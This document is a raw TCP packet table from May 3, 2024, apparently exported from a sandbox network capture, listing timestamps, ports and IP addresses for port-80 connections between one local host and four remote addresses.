May 3, 2024 11:32:39.585047007 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585074902 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585120916 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585155010 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585201025 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585257053 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585302114 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585350990 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585396051 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585419893 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585468054 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585531950 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585578918 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585617065 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585665941 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585685015 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585731030 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585752010 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585798979 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585855007 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.585896015 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.585968971 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586007118 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586013079 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586052895 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586091995 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586128950 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586136103 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586173058 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586177111 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586221933 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586266041 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586302042 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586311102 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586352110 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586379051 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586420059 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586460114 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586502075 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586586952 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586630106 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586647987 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586689949 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586707115 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586743116 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586827993 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586870909 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.586899996 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.586940050 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587006092 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587039948 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587064028 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587101936 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587130070 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587171078 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587212086 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587253094 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587299109 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587342024 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587363958 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587404966 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587423086 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587467909 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587493896 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587532043 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587683916 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587726116 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587743998 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587786913 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587814093 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587852955 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587867022 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587908983 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.587935925 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.587973118 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588016987 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588058949 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588115931 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588157892 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588185072 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588222980 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588289976 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588334084 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588361025 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588398933 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588402033 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588438988 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588445902 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588485956 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588535070 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588574886 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588630915 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588671923 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588702917 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588743925 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588807106 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588857889 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588860989 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588903904 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.588920116 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.588963985 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.589010954 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.589055061 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.589106083 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.589154005 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.589617968 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.589658976 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.589716911 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.589757919 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.589799881 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.589840889 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.589883089 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.589925051 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.589953899 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.589996099 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.590013981 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.590054035 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.590073109 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.590114117 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.590579987 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.590621948 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.590626001 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.590663910 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.590704918 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.590748072 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.590797901 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.590837002 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.590893030 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.590935946 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.590965986 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591003895 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591031075 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591073036 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591201067 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591242075 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591269016 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591310024 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591367006 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591403961 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591456890 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591496944 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591542006 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591583014 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591609955 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591650963 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591692924 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591732979 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591758966 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591804981 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591814041 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591854095 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591896057 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.591933966 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.591983080 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.592025042 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.592123985 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.592166901 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.592196941 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.592236996 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.592252970 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.592293978 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.592309952 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.592344999 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.592354059 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.592384100 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.592410088 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.592448950 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.628480911 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.706363916 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.706427097 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.706428051 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.706451893 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.706471920 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.706487894 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.706489086 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.706505060 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.706516027 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.706541061 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.706548929 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.706583023 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.706592083 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.706621885 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.706660986 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.706696987 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707138062 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707189083 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707235098 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707278013 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707400084 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707442999 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707464933 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707499027 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707505941 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707539082 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707617044 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707658052 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707660913 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707693100 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707710028 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707752943 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707871914 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707916021 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707925081 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.707969904 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.707977057 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708018064 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708086967 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708133936 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708142042 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708184958 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708192110 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708234072 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708268881 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708312035 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708312988 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708358049 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708395004 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708435059 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708487988 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708534002 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708554983 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708595037 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708848000 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708889961 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708915949 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.708952904 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.708973885 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.709014893 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.709033012 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.709074974 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.709084988 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.709121943 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.709157944 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.709201097 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.833197117 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.833374977 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:50.270107031 CEST	49166	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:50.574573040 CEST	80	49166	47.238.226.135	192.168.2.22
May 3, 2024 11:32:50.574666977 CEST	49166	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:50.649478912 CEST	49166	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:50.953886032 CEST	80	49166	47.238.226.135	192.168.2.22
May 3, 2024 11:32:50.953905106 CEST	80	49166	47.238.226.135	192.168.2.22
May 3, 2024 11:32:50.953944921 CEST	49166	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:51.258305073 CEST	80	49166	47.238.226.135	192.168.2.22
May 3, 2024 11:32:51.258389950 CEST	80	49166	47.238.226.135	192.168.2.22
May 3, 2024 11:32:51.258548975 CEST	49166	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:52.204819918 CEST	49166	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:53.216115952 CEST	49167	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:53.522028923 CEST	80	49167	47.238.226.135	192.168.2.22
May 3, 2024 11:32:53.522170067 CEST	49167	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:53.522403955 CEST	49167	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:53.828268051 CEST	80	49167	47.238.226.135	192.168.2.22
May 3, 2024 11:32:53.828337908 CEST	80	49167	47.238.226.135	192.168.2.22
May 3, 2024 11:32:53.828397989 CEST	49167	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:55.025604010 CEST	49167	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:56.039815903 CEST	49168	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:56.340687037 CEST	80	49168	47.238.226.135	192.168.2.22
May 3, 2024 11:32:56.340792894 CEST	49168	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:56.341233969 CEST	49168	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:56.641904116 CEST	80	49168	47.238.226.135	192.168.2.22
May 3, 2024 11:32:56.641952038 CEST	80	49168	47.238.226.135	192.168.2.22
May 3, 2024 11:32:56.641988993 CEST	49168	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:56.942744017 CEST	80	49168	47.238.226.135	192.168.2.22
May 3, 2024 11:32:56.942785978 CEST	80	49168	47.238.226.135	192.168.2.22
May 3, 2024 11:32:56.942878008 CEST	49168	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:57.849328041 CEST	49168	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:58.863368034 CEST	49169	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:59.169142008 CEST	80	49169	47.238.226.135	192.168.2.22
May 3, 2024 11:32:59.169212103 CEST	49169	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:59.169436932 CEST	49169	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:59.474633932 CEST	80	49169	47.238.226.135	192.168.2.22
May 3, 2024 11:32:59.474654913 CEST	80	49169	47.238.226.135	192.168.2.22
May 3, 2024 11:32:59.474785089 CEST	49169	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:59.474922895 CEST	49169	80	192.168.2.22	47.238.226.135
May 3, 2024 11:32:59.780221939 CEST	80	49169	47.238.226.135	192.168.2.22
May 3, 2024 11:33:04.591187000 CEST	49170	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:04.702588081 CEST	80	49170	162.255.119.150	192.168.2.22
May 3, 2024 11:33:04.702652931 CEST	49170	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:04.703079939 CEST	49170	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:04.814491987 CEST	80	49170	162.255.119.150	192.168.2.22
May 3, 2024 11:33:04.814511061 CEST	80	49170	162.255.119.150	192.168.2.22
May 3, 2024 11:33:04.814555883 CEST	49170	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:04.926831961 CEST	80	49170	162.255.119.150	192.168.2.22
May 3, 2024 11:33:04.927161932 CEST	80	49170	162.255.119.150	192.168.2.22
May 3, 2024 11:33:04.927175045 CEST	80	49170	162.255.119.150	192.168.2.22
May 3, 2024 11:33:04.927225113 CEST	49170	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:06.210886955 CEST	49170	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:07.225009918 CEST	49171	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:07.336302042 CEST	80	49171	162.255.119.150	192.168.2.22
May 3, 2024 11:33:07.336385965 CEST	49171	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:07.336581945 CEST	49171	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:07.447993994 CEST	80	49171	162.255.119.150	192.168.2.22
May 3, 2024 11:33:07.448276997 CEST	80	49171	162.255.119.150	192.168.2.22
May 3, 2024 11:33:07.448292017 CEST	80	49171	162.255.119.150	192.168.2.22
May 3, 2024 11:33:07.448329926 CEST	49171	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:08.847294092 CEST	49171	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:09.861388922 CEST	49172	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:09.971333027 CEST	80	49172	162.255.119.150	192.168.2.22
May 3, 2024 11:33:09.971431017 CEST	49172	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:09.971736908 CEST	49172	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:10.081435919 CEST	80	49172	162.255.119.150	192.168.2.22
May 3, 2024 11:33:10.081531048 CEST	80	49172	162.255.119.150	192.168.2.22
May 3, 2024 11:33:10.081784964 CEST	49172	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:10.191690922 CEST	80	49172	162.255.119.150	192.168.2.22
May 3, 2024 11:33:10.191734076 CEST	80	49172	162.255.119.150	192.168.2.22
May 3, 2024 11:33:10.192188025 CEST	80	49172	162.255.119.150	192.168.2.22
May 3, 2024 11:33:10.192224026 CEST	80	49172	162.255.119.150	192.168.2.22
May 3, 2024 11:33:10.192271948 CEST	49172	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:11.483726025 CEST	49172	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:12.497864008 CEST	49173	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:12.608164072 CEST	80	49173	162.255.119.150	192.168.2.22
May 3, 2024 11:33:12.608371019 CEST	49173	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:12.608469963 CEST	49173	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:12.718698025 CEST	80	49173	162.255.119.150	192.168.2.22
May 3, 2024 11:33:12.719033003 CEST	80	49173	162.255.119.150	192.168.2.22
May 3, 2024 11:33:12.719069958 CEST	80	49173	162.255.119.150	192.168.2.22
May 3, 2024 11:33:12.719196081 CEST	49173	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:12.719301939 CEST	49173	80	192.168.2.22	162.255.119.150
May 3, 2024 11:33:12.829683065 CEST	80	49173	162.255.119.150	192.168.2.22
May 3, 2024 11:33:17.849765062 CEST	49174	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:17.942723989 CEST	80	49174	66.96.162.142	192.168.2.22
May 3, 2024 11:33:17.942919016 CEST	49174	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:17.943209887 CEST	49174	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:18.036057949 CEST	80	49174	66.96.162.142	192.168.2.22
May 3, 2024 11:33:18.036082029 CEST	80	49174	66.96.162.142	192.168.2.22
May 3, 2024 11:33:18.036215067 CEST	49174	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:18.129225969 CEST	80	49174	66.96.162.142	192.168.2.22
May 3, 2024 11:33:18.148755074 CEST	80	49174	66.96.162.142	192.168.2.22
May 3, 2024 11:33:18.148781061 CEST	80	49174	66.96.162.142	192.168.2.22
May 3, 2024 11:33:18.148855925 CEST	49174	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:19.455430031 CEST	49174	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:20.471286058 CEST	49175	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:20.565766096 CEST	80	49175	66.96.162.142	192.168.2.22
May 3, 2024 11:33:20.565854073 CEST	49175	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:20.566188097 CEST	49175	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:20.659729004 CEST	80	49175	66.96.162.142	192.168.2.22
May 3, 2024 11:33:20.674849033 CEST	80	49175	66.96.162.142	192.168.2.22
May 3, 2024 11:33:20.674899101 CEST	80	49175	66.96.162.142	192.168.2.22
May 3, 2024 11:33:20.674942970 CEST	49175	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:26.721823931 CEST	49175	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:27.723942995 CEST	49176	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:27.817013025 CEST	80	49176	66.96.162.142	192.168.2.22
May 3, 2024 11:33:27.817202091 CEST	49176	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:27.818240881 CEST	49176	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:27.911156893 CEST	80	49176	66.96.162.142	192.168.2.22
May 3, 2024 11:33:27.911199093 CEST	80	49176	66.96.162.142	192.168.2.22
May 3, 2024 11:33:27.911288023 CEST	49176	80	192.168.2.22	66.96.162.142
May 3, 2024 11:33:28.004185915 CEST	80	49176	66.96.162.142	192.168.2.22
